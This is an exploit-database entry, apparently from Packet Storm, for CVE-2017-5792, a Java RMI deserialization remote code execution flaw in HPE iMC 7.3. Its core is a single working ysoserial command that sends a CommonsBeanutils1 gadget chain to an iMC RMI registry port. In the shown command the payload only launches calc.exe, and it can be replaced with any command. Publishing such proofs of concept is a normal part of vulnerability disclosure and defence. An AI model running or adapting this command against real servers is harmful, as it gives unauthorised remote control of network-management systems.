Lucene search

K
packetstormChris LynePACKETSTORM:146148
HistoryJan 29, 2018 - 12:00 a.m.

HPE iMC 7.3 RMI Java Deserialization

2018-01-2900:00:00
Chris Lyne
packetstormsecurity.com
25

0.194 Low

EPSS

Percentile

96.3%

`# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability  
# Date: 01-28-2018  
# Exploit Author: Chris Lyne (@lynerc)  
# Vendor Homepage: www.hpe.com  
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=  
# Version: iMC PLAT v7.3 (E0504) Standard  
# Tested on: Windows Server 2008 R2 Enterprise 64-bit  
# CVE : CVE-2017-5792  
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/  
  
# note that this PoC will launch calc.exe  
  
$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe  
  
`

0.194 Low

EPSS

Percentile

96.3%